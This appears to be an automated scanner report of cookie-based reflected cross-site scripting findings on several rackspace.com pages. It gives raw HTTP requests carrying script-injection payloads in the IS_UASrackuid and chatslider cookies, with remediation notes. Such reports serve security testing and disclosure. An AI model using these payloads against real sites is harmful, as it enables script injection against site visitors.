Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d3549"><script>alert(1)</script>c2105beaa0e; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36dfa"%3balert(1)//68d567f16e3 was submitted in the IS_UASrackuid cookie. This input was echoed as 36dfa";alert(1)//68d567f16e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836dfa"%3balert(1)//68d567f16e3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 46001
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c69a1"><script>alert(1)</script>65527c5ab6d was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c69a1"><script>alert(1)</script>65527c5ab6d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df198"><script>alert(1)</script>8f0f6bdf54a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ddf198"><script>alert(1)</script>8f0f6bdf54a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8425"%3balert(1)//93a7591f9a was submitted in the chatslider cookie. This input was echoed as f8425";alert(1)//93a7591f9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df8425"%3balert(1)//93a7591f9a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb463"%3balert(1)//61c78126c9b was submitted in the IS_UASrackuid cookie. This input was echoed as bb463";alert(1)//61c78126c9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bb463"%3balert(1)//61c78126c9b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b330"><script>alert(1)</script>c80e5f2feb3 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85b330"><script>alert(1)</script>c80e5f2feb3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b585"%3balert(1)//a4502608eeb was submitted in the chatslider cookie. This input was echoed as 2b585";alert(1)//a4502608eeb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2b585"%3balert(1)//a4502608eeb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1564"><script>alert(1)</script>661a78b0f87 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df1564"><script>alert(1)</script>661a78b0f87; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 424d3"><script>alert(1)</script>4866eb29730 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8424d3"><script>alert(1)</script>4866eb29730; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52a7d"%3balert(1)//7794083a84 was submitted in the IS_UASrackuid cookie. This input was echoed as 52a7d";alert(1)//7794083a84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f852a7d"%3balert(1)//7794083a84; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 233a3"><script>alert(1)</script>7f8715196cc was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D233a3"><script>alert(1)</script>7f8715196cc; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ebad"%3balert(1)//29cb4cbffb7 was submitted in the chatslider cookie. This input was echoed as 2ebad";alert(1)//29cb4cbffb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
